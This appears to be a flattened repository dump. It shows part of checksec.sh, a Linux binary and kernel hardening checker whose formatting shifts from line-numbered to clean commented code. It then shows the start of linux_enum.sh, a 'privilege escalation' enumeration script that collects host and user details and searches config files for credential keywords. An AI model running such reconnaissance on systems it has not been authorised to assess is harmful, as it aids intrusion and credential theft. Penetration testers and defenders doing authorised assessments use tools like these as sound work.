-n -e '\033[32mFull RELRO \033[m ' 149 | else 150 | echo -n -e '\033[33mPartial RELRO\033[m ' 151 | fi 152 | else 153 | echo -n -e '\033[31mNo RELRO \033[m ' 154 | fi 155 | 156 | # check for stack canary support 157 | if readelf -s $1 2>/dev/null | grep -q '__stack_chk_fail'; then 158 | echo -n -e '\033[32mCanary found \033[m ' 159 | else 160 | echo -n -e '\033[31mNo canary found\033[m ' 161 | fi 162 | 163 | # check for NX support 164 | if readelf -W -l $1 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then 165 | echo -n -e '\033[31mNX disabled\033[m ' 166 | else 167 | echo -n -e '\033[32mNX enabled \033[m ' 168 | fi 169 | 170 | # check for PIE support 171 | if readelf -h $1 2>/dev/null | grep -q 'Type:[[:space:]]*EXEC'; then 172 | echo -n -e '\033[31mNo PIE \033[m ' 173 | elif readelf -h $1 2>/dev/null | grep -q 'Type:[[:space:]]*DYN'; then 174 | if readelf -d $1 2>/dev/null | grep -q '(DEBUG)'; then 175 | echo -n -e '\033[32mPIE enabled \033[m ' 176 | else 177 | echo -n -e '\033[33mDSO \033[m ' 178 | fi 179 | else 180 | echo -n -e '\033[33mNot an ELF file\033[m ' 181 | fi 182 | 183 | # check for rpath / run path 184 | if readelf -d $1 2>/dev/null | grep -q 'rpath'; then 185 | echo -n -e '\033[31mRPATH \033[m ' 186 | else 187 | echo -n -e '\033[32mNo RPATH \033[m ' 188 | fi 189 | 190 | if readelf -d $1 2>/dev/null | grep -q 'runpath'; then 191 | echo -n -e '\033[31mRUNPATH \033[m ' 192 | else 193 | echo -n -e '\033[32mNo RUNPATH \033[m ' 194 | fi 195 | } 196 | 197 | # check process(es) 198 | proccheck() { 199 | # check for RELRO support 200 | if readelf -l $1/exe 2>/dev/null | grep -q 'Program Headers'; then 201 | if readelf -l $1/exe 2>/dev/null | grep -q 'GNU_RELRO'; then 202 | if readelf -d $1/exe 2>/dev/null | grep -q 'BIND_NOW'; then 203 | echo -n -e '\033[32mFull RELRO \033[m ' 204 | else 205 | echo -n -e '\033[33mPartial RELRO \033[m ' 206 | fi 207 | else 208 | echo -n -e '\033[31mNo RELRO \033[m ' 209 | fi 210 | else 211 | echo -n -e '\033[31mPermission 
denied (please run as root)\033[m\n' 212 | exit 1 213 | fi 214 | 215 | # check for stack canary support 216 | if readelf -s $1/exe 2>/dev/null | grep -q 'Symbol table'; then 217 | if readelf -s $1/exe 2>/dev/null | grep -q '__stack_chk_fail'; then 218 | echo -n -e '\033[32mCanary found \033[m ' 219 | else 220 | echo -n -e '\033[31mNo canary found \033[m ' 221 | fi 222 | else 223 | if [ "$1" != "1" ] ; then 224 | echo -n -e '\033[33mPermission denied \033[m ' 225 | else 226 | echo -n -e '\033[33mNo symbol table found\033[m ' 227 | fi 228 | fi 229 | 230 | # first check for PaX support 231 | if cat $1/status 2> /dev/null | grep -q 'PaX:'; then 232 | pageexec=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b6) ) 233 | segmexec=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b10) ) 234 | mprotect=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b8) ) 235 | randmmap=( $(cat $1/status 2> /dev/null | grep 'PaX:' | cut -b9) ) 236 | if [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "M" && "$randmmap" = "R" ]] ; then 237 | echo -n -e '\033[32mPaX enabled\033[m ' 238 | elif [[ "$pageexec" = "p" && "$segmexec" = "s" && "$randmmap" = "R" ]] ; then 239 | echo -n -e '\033[33mPaX ASLR only\033[m ' 240 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "m" && "$randmmap" = "R" ]] ; then 241 | echo -n -e '\033[33mPaX mprot off \033[m' 242 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "M" && "$randmmap" = "r" ]] ; then 243 | echo -n -e '\033[33mPaX ASLR off\033[m ' 244 | elif [[ "$pageexec" = "P" || "$segmexec" = "S" ]] && [[ "$mprotect" = "m" && "$randmmap" = "r" ]] ; then 245 | echo -n -e '\033[33mPaX NX only\033[m ' 246 | else 247 | echo -n -e '\033[31mPaX disabled\033[m ' 248 | fi 249 | # fallback check for NX support 250 | elif readelf -W -l $1/exe 2>/dev/null | grep 'GNU_STACK' | grep -q 'RWE'; then 251 | echo -n -e '\033[31mNX disabled\033[m ' 252 | else 253 | echo -n -e '\033[32mNX enabled \033[m ' 254 
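| fi 255 | 256 | # check for PIE support 257 | if readelf -h $1/exe 2>/dev/null | grep -q 'Type:[[:space:]]*EXEC'; then 258 | echo -n -e '\033[31mNo PIE \033[m ' 259 | elif readelf -h $1/exe 2>/dev/null | grep -q 'Type:[[:space:]]*DYN'; then 260 | if readelf -d $1/exe 2>/dev/null | grep -q '(DEBUG)'; then 261 | echo -n -e '\033[32mPIE enabled \033[m ' 262 | else 263 | echo -n -e '\033[33mDynamic Shared Object\033[m ' 264 | fi 265 | else 266 | echo -n -e '\033[33mNot an ELF file \033[m ' 267 | fi 268 | }

#######################################
# List the ELF objects mapped into a process and run filecheck on each.
# Globals:   libs (written)
# Arguments: $1 - PID (a directory name under /proc)
# Outputs:   one filecheck report per mapped ELF file
# Note:      only the sixth field of each maps line is used, so a mapped
#            path that contains whitespace is truncated at the first blank.
#######################################
libcheck() {
  libs=( $(awk '{ print $6 }' "/proc/$1/maps" | grep '/' | sort -u | xargs file | grep ELF | awk '{ print $1 }' | sed 's/:/ /') )

  printf "\n* Loaded libraries (file information, # of mapped files: %s):\n\n" "${#libs[@]}"

  local lib
  for lib in "${libs[@]}"; do
    echo " $lib:"
    echo -n " "
    filecheck "$lib"
    printf "\n\n"
  done
}

#######################################
# Report system-wide ASLR: the PaX flags of PID 1 when present, otherwise
# the kernel.randomize_va_space setting.
# Outputs:   coloured status text on stdout
#######################################
aslrcheck() {
  # PaX ASLR support
  if ! grep -q 'Name:' /proc/1/status 2>/dev/null; then
    echo -n -e ':\033[33m insufficient privileges for PaX ASLR checks\033[m\n'
    echo -n -e ' Fallback to standard Linux ASLR check'
  fi

  if grep -q 'PaX:' /proc/1/status 2>/dev/null; then
    printf ": "
    if grep 'PaX:' /proc/1/status 2>/dev/null | grep -q 'R'; then
      echo -n -e '\033[32mPaX ASLR enabled\033[m\n\n'
    else
      echo -n -e '\033[31mPaX ASLR disabled\033[m\n\n'
    fi
  else
    # standard Linux 'kernel.randomize_va_space' ASLR support
    # (see the kernel file 'Documentation/sysctl/kernel.txt' for a detailed description)
    printf " (kernel.randomize_va_space): "

    # Read the value straight from procfs: this does not depend on a sysctl
    # binary living in /sbin, whose absence would otherwise be reported as
    # "Not supported".
    local aslr_setting
    aslr_setting=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)

    case "$aslr_setting" in
      1)
        echo -n -e '\033[33mOn (Setting: 1)\033[m\n\n'
        printf " Description - Make the addresses of mmap base, stack and VDSO page randomized.\n"
        printf " This, among other things, implies that shared libraries will be loaded to \n"
        printf " random addresses. Also for PIE-linked binaries, the location of code start\n"
        printf " is randomized. Heap addresses are *not* randomized.\n\n"
        ;;
      2)
        echo -n -e '\033[32mOn (Setting: 2)\033[m\n\n'
        printf " Description - Make the addresses of mmap base, heap, stack and VDSO page randomized.\n"
        printf " This, among other things, implies that shared libraries will be loaded to random \n"
        printf " addresses. Also for PIE-linked binaries, the location of code start is randomized.\n\n"
        ;;
      0)
        echo -n -e '\033[31mOff (Setting: 0)\033[m\n'
        ;;
      *)
        echo -n -e '\033[31mNot supported\033[m\n'
        ;;
    esac
    printf " See the kernel file 'Documentation/sysctl/kernel.txt' for more details.\n\n"
  fi
}

#######################################
# Report whether /proc/cpuinfo advertises the NX flag.
# Outputs:   green "Yes" or red "No"
#######################################
nxcheck() {
  # -w: match "nx" as a whole word, not as a substring of another token
  if grep -qw nx /proc/cpuinfo; then
    echo -n -e '\033[32mYes\033[m\n\n'
  else
    echo -n -e '\033[31mNo\033[m\n\n'
  fi
}

# private helper: succeed when the selected kernel config contains OPTION=y
# Globals:   _kconfig_cmd (read) - command that prints the kernel config
# Arguments: $1 - option name, e.g. CONFIG_STRICT_DEVMEM
_kconfig_has() {
  "${_kconfig_cmd[@]}" | grep -qi "$1=y"
}

# private helper: print "Enabled" when any of the given options is set to y,
# "Disabled" otherwise
# Arguments: $@ - one or more option names (alternative spellings)
_kconfig_report() {
  local option
  for option in "$@"; do
    if _kconfig_has "$option"; then
      printf "\033[32mEnabled\033[m\n"
      return 0
    fi
  done
  printf "\033[31mDisabled\033[m\n"
}

#######################################
# Report kernel self-protection options found in the kernel config.
# Globals:   kconfig (written, kept as a command string for compatibility),
#            _kconfig_cmd (written), KBUILD_OUTPUT (read)
# Outputs:   one status line per option
# Returns:   exits 0 when no kernel config can be found
# Caveats:   a config read from /boot or a source tree may differ from the
#            running kernel (a warning is printed). An option that was
#            renamed or removed upstream reads as "Disabled", so a red entry
#            on a recent kernel needs checking against that kernel's Kconfig.
#######################################
kernelcheck() {
  printf " Description - List the status of kernel protection mechanisms. Rather than\n"
  printf " inspect kernel mechanisms that may aid in the prevention of exploitation of\n"
  printf " userspace processes, this option lists the status of kernel configuration\n"
  printf " options that harden the kernel itself against attack.\n\n"
  printf " Kernel config: "

  local krelease src_config
  krelease=$(uname -r)
  src_config="${KBUILD_OUTPUT:-/usr/src/linux}/.config"

  # The reader is kept as an array so that a path containing whitespace
  # (KBUILD_OUTPUT is caller-controlled) is passed as a single argument.
  if [ -f /proc/config.gz ] ; then
    kconfig="zcat /proc/config.gz"
    _kconfig_cmd=(zcat /proc/config.gz)
    printf "\033[32m/proc/config.gz\033[m\n\n"
  elif [ -f "/boot/config-$krelease" ] ; then
    kconfig="cat /boot/config-$krelease"
    _kconfig_cmd=(cat "/boot/config-$krelease")
    printf "\033[33m%s\033[m\n\n" "/boot/config-$krelease"
    printf " Warning: The config on disk may not represent running kernel config!\n\n"
  elif [ -f "$src_config" ] ; then
    kconfig="cat $src_config"
    _kconfig_cmd=(cat "$src_config")
    printf "\033[33m%s\033[m\n\n" "$src_config"
    printf " Warning: The config on disk may not represent running kernel config!\n\n"
  else
    printf "\033[31mNOT FOUND\033[m\n\n"
    exit 0
  fi

  printf " GCC stack protector support: "
  # newer kernels spell this option CONFIG_STACKPROTECTOR
  _kconfig_report CONFIG_CC_STACKPROTECTOR CONFIG_STACKPROTECTOR

  printf " Strict user copy checks: "
  _kconfig_report CONFIG_DEBUG_STRICT_USER_COPY_CHECKS

  printf " Enforce read-only kernel data: "
  # newer kernels spell this option CONFIG_STRICT_KERNEL_RWX
  _kconfig_report CONFIG_DEBUG_RODATA CONFIG_STRICT_KERNEL_RWX

  printf " Restrict /dev/mem access: "
  _kconfig_report CONFIG_STRICT_DEVMEM

  printf " Restrict /dev/kmem access: "
  # inverted on purpose: /dev/kmem support being built in is the weak state
  if _kconfig_has CONFIG_DEVKMEM; then
    printf "\033[31mDisabled\033[m\n"
  else
    printf "\033[32mEnabled\033[m\n"
  fi

  printf "\n"
  printf "* grsecurity / PaX: "

  if _kconfig_has CONFIG_GRKERNSEC; then
    if _kconfig_has CONFIG_GRKERNSEC_HIGH; then
      printf "\033[32mHigh GRKERNSEC\033[m\n\n"
    elif _kconfig_has CONFIG_GRKERNSEC_MEDIUM; then
      printf "\033[33mMedium GRKERNSEC\033[m\n\n"
    elif _kconfig_has CONFIG_GRKERNSEC_LOW; then
      printf "\033[31mLow GRKERNSEC\033[m\n\n"
    else
      printf "\033[33mCustom GRKERNSEC\033[m\n\n"
    fi

    printf " Non-executable kernel pages: "
    _kconfig_report CONFIG_PAX_KERNEXEC

    printf " Prevent userspace pointer deref: "
    _kconfig_report CONFIG_PAX_MEMORY_UDEREF

    printf " Prevent kobject refcount overflow: "
    _kconfig_report CONFIG_PAX_REFCOUNT

    printf " Bounds check heap object copies: "
    _kconfig_report CONFIG_PAX_USERCOPY

    printf " Disable writing to kmem/mem/port: "
    _kconfig_report CONFIG_GRKERNSEC_KMEM

    printf " Disable privileged I/O: "
    _kconfig_report CONFIG_GRKERNSEC_IO

    printf " Harden module auto-loading: "
    _kconfig_report CONFIG_GRKERNSEC_MODHARDEN

    printf " Hide kernel symbols: "
    _kconfig_report CONFIG_GRKERNSEC_HIDESYM
  else
    printf "\033[31mNo GRKERNSEC\033[m\n\n"
    printf " The grsecurity / PaX patchset is available here:\n"
    printf " http://grsecurity.net/\n"
  fi

  printf "\n"
  printf "* Kernel Heap Hardening: "

  if _kconfig_has CONFIG_KERNHEAP; then
    if _kconfig_has CONFIG_KERNHEAP_FULLPOISON; then
      printf "\033[32mFull KERNHEAP\033[m\n\n"
    else
      printf "\033[33mPartial KERNHEAP\033[m\n\n"
    fi
  else
    printf "\033[31mNo KERNHEAP\033[m\n\n"
    printf " The KERNHEAP hardening patchset is available here:\n"
    printf " https://www.subreption.com/kernheap/\n\n"
  fi
}

# --- FORTIFY_SOURCE subfunctions (start) ---

# is FORTIFY_SOURCE supported by libc?
# Globals:   FS_chk_func_libc (read)
# Returns:   exits 1 when libc exports no *_chk functions
FS_libc_check() {
  printf "* FORTIFY_SOURCE support available (libc) : "

  if [ "${#FS_chk_func_libc[@]}" != "0" ] ; then
    printf "\033[32mYes\033[m\n"
  else
    printf "\033[31mNo\033[m\n"
    exit 1
  fi
}

# was the binary compiled with FORTIFY_SOURCE?
# Globals:   FS_functions (read)
# Returns:   returns at the first symbol containing "_chk"; exits 1 if none
FS_binary_check() {
  printf "* Binary compiled with FORTIFY_SOURCE support: "

  local fs_symbol
  for fs_symbol in "${FS_functions[@]}"; do
    if [[ $fs_symbol =~ _chk ]] ; then
      printf "\033[32mYes\033[m\n"
      return
    fi
  done
  printf "\033[31mNo\033[m\n"
  exit 1
}

# Print, for every fortifiable libc function, whether the binary references
# the plain (unchecked, red) or the *_chk (checked, green) variant.
# Globals:   FS_chk_func_libc, FS_functions, FS_end (read);
#            FS_tmp_func, FS_tmp_libc, FS_cnt_total, FS_cnt_checked,
#            FS_cnt_unchecked (written)
FS_comparison() {
  echo
  printf " ------ EXECUTABLE-FILE ------- . -------- LIBC --------\n"
  printf " FORTIFY-able library functions | Checked function names\n"
  printf " -------------------------------------------------------\n"

  for FS_tmp_libc in "${FS_chk_func_libc[@]}"; do
    for FS_tmp_func in "${FS_functions[@]}"; do
      # Symbol names are compared as literal strings, not compiled as
      # regular expressions.
      if [[ $FS_tmp_func == "$FS_tmp_libc" ]] ; then
        printf " \033[31m%-30s\033[m | __%s%s\n" "$FS_tmp_func" "$FS_tmp_libc" "$FS_end"
        FS_cnt_total=$((FS_cnt_total + 1))
        FS_cnt_unchecked=$((FS_cnt_unchecked + 1))
      elif [[ $FS_tmp_func == "${FS_tmp_libc}_chk"* ]] ; then
        printf " \033[32m%-30s\033[m | __%s%s\n" "$FS_tmp_func" "$FS_tmp_libc" "$FS_end"
        FS_cnt_total=$((FS_cnt_total + 1))
        FS_cnt_checked=$((FS_cnt_checked + 1))
      fi
    done
  done
}

# Print the totals gathered by FS_comparison.
# Globals:   FS_chk_func_libc, FS_functions, FS_cnt_total, FS_cnt_checked,
#            FS_cnt_unchecked (read)
FS_summary() {
  echo
  printf "SUMMARY:\n\n"
  printf "* Number of checked functions in libc : %s\n" "${#FS_chk_func_libc[@]}"
  printf "* Total number of library functions in the executable: %s\n" "${#FS_functions[@]}"
  printf "* Number of FORTIFY-able functions in the executable : %s\n" "$FS_cnt_total"
  printf "* Number of checked functions in the executable : \033[32m%s\033[m\n" "$FS_cnt_checked"
  printf "* Number of unchecked functions in the executable : \033[31m%s\033[m\n" "$FS_cnt_unchecked"
  echo
}

# private helper: pick the first libc.so.6 found in the known locations
# Globals:   FS_libc (written)
# Returns:   exits 1 when none of the candidate paths exists
_FS_locate_libc() {
  local candidate
  for candidate in /lib/libc.so.6 /lib64/libc.so.6 \
                   /lib/i386-linux-gnu/libc.so.6 /lib/x86_64-linux-gnu/libc.so.6; do
    if [ -e "$candidate" ] ; then
      FS_libc=$candidate
      return 0
    fi
  done
  printf "\033[31mError: libc not found.\033[m\n\n"
  exit 1
}

# private helper: load the symbol lists that the FS_* reports work on
# Globals:   FS_libc (read); FS_chk_func_libc, FS_functions (written)
# Arguments: $1 - path of the ELF file to inspect
_FS_load_symbols() {
  FS_chk_func_libc=( $(readelf -s "$FS_libc" | grep _chk@@ | awk '{ print $8 }' | cut -c 3- | sed -e 's/_chk@.*//') )
  FS_functions=( $(readelf -s "$1" | awk '{ print $8 }' | sed 's/_*//' | sed -e 's/@.*//') )
}

# --- FORTIFY_SOURCE subfunctions (end) ---

# private helper: stop when readelf was reported missing
# Globals:   have_readelf (read; treated as available when unset)
_need_readelf() {
  if [ "${have_readelf:-1}" -eq 0 ] ; then
    exit 1
  fi
}

# private helper: validate the file argument of --file / --fortify-file
# Arguments: $1 - path supplied on the command line
# Returns:   exits 1 when the path is empty, missing, unreadable or not ELF
_require_elf_file() {
  if [ -z "$1" ] ; then
    printf "\033[31mError: Please provide a valid file.\033[m\n\n"
    exit 1
  fi
  # does the file exist?
  if [ ! -e "$1" ] ; then
    printf "\033[31mError: The file '%s' does not exist.\033[m\n\n" "$1"
    exit 1
  fi
  # read permissions?
  if [ ! -r "$1" ] ; then
    printf "\033[31mError: No read permissions for '%s' (run as root).\033[m\n\n" "$1"
    exit 1
  fi
  # ELF executable?
  out=$(file "$1")
  if [[ ! $out =~ ELF ]] ; then
    printf "\033[31mError: Not an ELF file: "
    file "$1"
    printf "\033[m\n"
    exit 1
  fi
}

# private helper: stop when <pid>/exe cannot be read (expects cwd = /proc)
# Arguments: $1 - PID
# Returns:   exits 1 in every case where the exe link is unreadable
_require_readable_exe() {
  if [ ! -r "$1/exe" ] ; then
    if ! (root_privs) ; then
      printf "\033[31mNo read permissions for '/proc/%s/exe' (run as root).\033[m\n\n" "$1"
      exit 1
    fi
    if [ -z "$(readlink "$1/exe")" ] ; then
      printf "\033[31mPermission denied. Requested process ID belongs to a kernel thread.\033[m\n\n"
      exit 1
    fi
    exit 1
  fi
}

if ! (command_exists readelf) ; then
  printf "\033[31mWarning: 'readelf' not found! It's required for most checks.\033[m\n\n"
  have_readelf=0
fi

# parse command-line arguments
#
# File names, directory names and process names come from the command line
# and from directory listings. They are quoted wherever they are expanded and
# are passed to printf as arguments, never as part of the format string, so
# blanks, glob characters, '%' or backslashes in a name cannot change what is
# tested or printed.
case "$1" in

  --version)
    version
    exit 0
    ;;

  --help)
    help
    exit 0
    ;;

  --dir)
    if [ "$3" = "-v" ] ; then
      verbose=true
    fi
    _need_readelf
    if [ -z "$2" ] ; then
      printf "\033[31mError: Please provide a valid directory.\033[m\n\n"
      exit 1
    fi
    # remove trailing slashes
    tempdir=$(printf '%s\n' "$2" | sed -e 's/\/*$//')
    # "/" strips to the empty string; an empty name would make the later
    # 'cd' fall back to $HOME, so map it back to the root directory
    if [ -z "$tempdir" ] ; then
      tempdir=/
    fi
    if [ ! -d "$tempdir" ] ; then
      printf "\033[31mError: The directory '%s' does not exist.\033[m\n\n" "$tempdir"
      exit 1
    fi
    # prefix used when printing paths; exactly one slash, also for "/"
    dirprefix="${tempdir%/}/"
    cd "$tempdir" || exit 1
    printf "RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\n"
    for N in [A-Za-z]*; do
      if [ "$N" != "[A-Za-z]*" ]; then
        # read permissions?
        if [ ! -r "$N" ]; then
          printf "\033[31mError: No read permissions for '%s' (run as root).\033[m\n" "$dirprefix$N"
        else
          # ELF executable?
          out=$(file "$N")
          if [[ ! $out =~ ELF ]] ; then
            if [ "$verbose" = "true" ] ; then
              printf "\033[34m*** Not an ELF file: %s" "$dirprefix"
              file "$N"
              printf "\033[m"
            fi
          else
            filecheck "$N"
            # setuid/setgid files are highlighted. The lookup is relative to
            # the current directory because of the 'cd' above; prefixing a
            # relative --dir argument again would point at the wrong path.
            if [ -n "$(find "./$N" \( -perm -004000 -o -perm -002000 \) -type f -print)" ]; then
              printf "\033[37;41m%s%s\033[m" "$dirprefix" "$N"
            else
              printf "%s%s" "$dirprefix" "$N"
            fi
            echo
          fi
        fi
      fi
    done
    exit 0
    ;;

  --file)
    _need_readelf
    _require_elf_file "$2"
    printf "RELRO STACK CANARY NX PIE RPATH RUNPATH FILE\n"
    filecheck "$2"
    # setuid/setgid files are highlighted
    if [ -n "$(find "$2" \( -perm -004000 -o -perm -002000 \) -type f -print)" ] ; then
      printf "\033[37;41m%s\033[m" "$2"
    else
      printf "%s" "$2"
    fi
    echo
    exit 0
    ;;

  --proc-all)
    _need_readelf
    cd /proc || exit 1
    printf "* System-wide ASLR"
    aslrcheck
    printf "* Does the CPU support NX: "
    nxcheck
    printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n"
    for N in [1-9]*; do
      # skip this script's own PID and entries without a resolvable exe link
      if [ "$N" != "$$" ] && readlink -q "$N/exe" > /dev/null; then
        printf "%16s" "$(head -1 "$N/status" | cut -b 7-)"
        printf "%7d " "$N"
        proccheck "$N"
        echo
      fi
    done
    if [ ! -e /usr/bin/id ] ; then
      printf "\n\033[33mNote: If you are running 'checksec.sh' as an unprivileged user, you\n"
      printf " will not see all processes. Please run the script as root.\033[m\n\n"
    else
      if ! (root_privs) ; then
        printf "\n\033[33mNote: You are running 'checksec.sh' as an unprivileged user.\n"
        printf " Too see all processes, please run the script as root.\033[m\n\n"
      fi
    fi
    exit 0
    ;;

  --proc)
    _need_readelf
    if [ -z "$2" ] ; then
      printf "\033[31mError: Please provide a valid process name.\033[m\n\n"
      exit 1
    fi
    if ! (isString "$2") ; then
      printf "\033[31mError: Please provide a valid process name.\033[m\n\n"
      exit 1
    fi
    cd /proc || exit 1
    printf "* System-wide ASLR"
    aslrcheck
    printf "* Does the CPU support NX: "
    nxcheck
    printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n"
    # the name is still a grep pattern, as before; '--' keeps it from being
    # read as an option
    for N in $(ps -Ao pid,comm | grep -- "$2" | cut -b1-6); do
      if [ -d "$N" ] ; then
        printf "%16s" "$(head -1 "$N/status" | cut -b 7-)"
        printf "%7d " "$N"
        # read permissions?
        _require_readable_exe "$N"
        proccheck "$N"
        echo
      fi
    done
    exit 0
    ;;

  --proc-libs)
    _need_readelf
    if [ -z "$2" ] ; then
      printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
      exit 1
    fi
    if ! (isNumeric "$2") ; then
      printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
      exit 1
    fi
    cd /proc || exit 1
    printf "* System-wide ASLR"
    aslrcheck
    printf "* Does the CPU support NX: "
    nxcheck
    printf "* Process information:\n\n"
    printf " COMMAND PID RELRO STACK CANARY NX/PaX PIE\n"
    N=$2
    if [ -d "$N" ] ; then
      printf "%16s" "$(head -1 "$N/status" | cut -b 7-)"
      printf "%7d " "$N"
      # read permissions?
      _require_readable_exe "$N"
      proccheck "$N"
      echo
      libcheck "$N"
    fi
    exit 0
    ;;

  --kernel)
    cd /proc || exit 1
    printf "* Kernel protection information:\n\n"
    kernelcheck
    exit 0
    ;;

  --fortify-file)
    _need_readelf
    _require_elf_file "$2"
    _FS_locate_libc
    _FS_load_symbols "$2"

    FS_libc_check
    FS_binary_check
    FS_comparison
    FS_summary

    exit 0
    ;;

  --fortify-proc)
    _need_readelf
    if [ -z "$2" ] ; then
      printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
      exit 1
    fi
    if ! (isNumeric "$2") ; then
      printf "\033[31mError: Please provide a valid process ID.\033[m\n\n"
      exit 1
    fi
    cd /proc || exit 1
    N=$2
    if [ -d "$N" ] ; then
      # read permissions?
      _require_readable_exe "$N"
      _FS_locate_libc
      printf "* Process name (PID) : %s (%d)\n" "$(head -1 "$N/status" | cut -b 7-)" "$N"
      _FS_load_symbols "$2/exe"

      FS_libc_check
      FS_binary_check
      FS_comparison
      FS_summary
    fi
    exit 0
    ;;

  *)
    if [ "$#" != "0" ] ; then
      printf "\033[31mError: Unknown option '%s'.\033[m\n\n" "$1"
    fi
    help
    exit 1
    ;;
esac
-------------------------------------------------------------------------------- /linux_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #A simple script to enumerate local information from a Linux host 3 | #version 0.3 4 | #@oshearing 5 | #@roo7break (further enhancements) 6 | 7 | #option to store to a file 8 | outfile="$1" 9 | 10 | if [ "$outfile" ]; then 11 | echo -e "#########################################################" >> $outfile 12 | echo -e "Local Linux Enumeration & Privilege Escalation Script" >> $outfile 13 | echo -e "#########################################################" >> $outfile 14 | echo -e "# www.rebootuser.com" >> $outfile 15 | echo -e "# version 0.4" >> $outfile 16 | echo -e "For silent (and clean output) Outfile and keyword(s) can be supplied from the command line:\n" >>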
$outfile 17 | echo -e "usage ./LinEnum.sh outfile.txt 'keyword1 keyword2'\n" >> $outfile 18 | else 19 | echo -e "\n\e[00;30m#########################################################\e[00m" 20 | echo -e "\e[00;34mLocal Linux Enumeration & Privilege Escalation Script\e[00m" 21 | echo -e "\e[00;30m#########################################################\e[00m" 22 | echo -e "\e[00;30m# www.rebootuser.com\e[00m" 23 | echo -e "\e[00;30m# version 0.4\e[00m\n" 24 | echo -e "\e[00;34mFor silent (and clean output) Outfile and keyword(s) can be supplied from the command line:\e[00m\n" 25 | echo -e "\e[00;34musage ./LinEnum.sh outfile.txt 'keyword1 keyword2'\e[00m\n" 26 | fi 27 | 28 | #enter a single keyword that'll be used to search within *.conf, *.log & *.ini files. 29 | if [ "$outfile" ]; then 30 | echo "Enter keywords (space separated) that'll be used to search in *.conf, *.log and *.ini files (e.g. password cred)" >> $outfile 31 | #accepts search keywords from commandline 32 | keyword="$2" 33 | echo -e "$keyword" >> $outfile 34 | else 35 | echo "Enter keywords (space separated) that'll be used to search in *.conf, *.log and *.ini files (e.g. 
password cred)" 36 | #accepts search keywords from commandline 37 | read keyword 38 | fi 39 | 40 | who=`whoami` 41 | 42 | if [ "$outfile" ]; then 43 | echo -e "\n" >> $outfile 44 | thedate=`date` 45 | echo -e "Scan started at: $thedate" >> $outfile 46 | echo -e "\n" >> $outfile 47 | else 48 | echo -e "\n" 49 | echo -e "\e[00;30mScan started at:"; date 50 | echo -e "\e[00m\n" 51 | fi 52 | 53 | if [ "$outfile" ]; then 54 | echo -e "### SYSTEM ##############################################" >> $outfile 55 | else 56 | echo -e "\e[00;34m### SYSTEM ##############################################\e[00m" 57 | fi 58 | 59 | unameinfo=`uname -a 2>/dev/null` 60 | 61 | if [ "$outfile" ]; then 62 | if [ "$unameinfo" ]; then 63 | echo -e "Kernel information:\n$unameinfo" >> $outfile 64 | echo -e "\n" >> $outfile 65 | else 66 | : 67 | fi 68 | else 69 | if [ "$unameinfo" ]; then 70 | echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" 71 | echo -e "\n" 72 | else 73 | : 74 | fi 75 | fi 76 | 77 | procver=`cat /proc/version 2>/dev/null` 78 | 79 | if [ "$outfile" ];then 80 | if [ "$procver" ]; then 81 | echo -e "Kernel information (continued):\n$procver" >> $outfile 82 | echo -e "\n" >> $outfile 83 | else 84 | : 85 | fi 86 | else 87 | if [ "$procver" ]; then 88 | echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" 89 | echo -e "\n" 90 | else 91 | : 92 | fi 93 | fi 94 | 95 | #search all *-release files for version info 96 | release=`cat /etc/*-release 2>/dev/null` 97 | 98 | if [ "$outfile" ];then 99 | if [ "$release" ]; then 100 | echo -e "Specific release information:\n$release" >> $outfile 101 | echo -e "\n" >> $outfile 102 | else 103 | : 104 | fi 105 | else 106 | if [ "$release" ]; then 107 | echo -e "\e[00;31mSpecific release information:\e[00m\n$release" 108 | echo -e "\n" 109 | else 110 | : 111 | fi 112 | fi 113 | 114 | hostnamed=`hostname 2>/dev/null` 115 | 116 | if [ "$outfile" ];then 117 | if [ "$hostnamed" ]; then 118 | echo -e "Hostname:\n$hostnamed" >> 
$outfile 119 | echo -e "\n" >> $outfile 120 | else 121 | : 122 | fi 123 | else 124 | if [ "$hostnamed" ]; then 125 | echo -e "\e[00;31mHostname:\e[00m\n$hostnamed" 126 | echo -e "\n" 127 | else 128 | : 129 | fi 130 | fi 131 | 132 | if [ "$outfile" ]; then 133 | echo -e "### USER/GROUP ##########################################" >> $outfile 134 | else 135 | echo -e "\e[00;34m### USER/GROUP ##########################################\e[00m" 136 | fi 137 | 138 | currusr=`id 2>/dev/null` 139 | if [ "$outfile" ]; then 140 | if [ "$currusr" ]; then 141 | echo -e "Current user/group info:\n$currusr" >> $outfile 142 | echo -e "\n" >> $outfile 143 | else 144 | : 145 | fi 146 | else 147 | if [ "$currusr" ]; then 148 | echo -e "\e[00;31mCurrent user/group info:\e[00m\n$currusr" 149 | echo -e "\n" 150 | else 151 | : 152 | fi 153 | fi 154 | 155 | grpinfo=`getent group $who 2>/dev/null` 156 | if [ "$outfile" ];then 157 | if [ "$grpinfo" ]; then 158 | echo -e "All members of 'our' group(s):\n$grpinfo" >> $outfile 159 | echo -e "\n" >> $outfile 160 | else 161 | : 162 | fi 163 | else 164 | if [ "$grpinfo" ]; then 165 | echo -e "\e[00;31mAll members of 'our' group(s):\e[00m\n$grpinfo" 166 | echo -e "\n" 167 | else 168 | : 169 | fi 170 | fi 171 | 172 | lastlogedonusrs=`lastlog |grep -v "Never" 2>/dev/null` 173 | if [ "$outfile" ];then 174 | if [ "$lastlogedonusrs" ]; then 175 | echo -e "Users that have previously logged onto the system:\n$lastlogedonusrs" >> $outfile 176 | echo -e "\n" >> $outfile 177 | else 178 | : 179 | fi 180 | else 181 | if [ "$lastlogedonusrs" ]; then 182 | echo -e "\e[00;31mUsers that have previously logged onto the 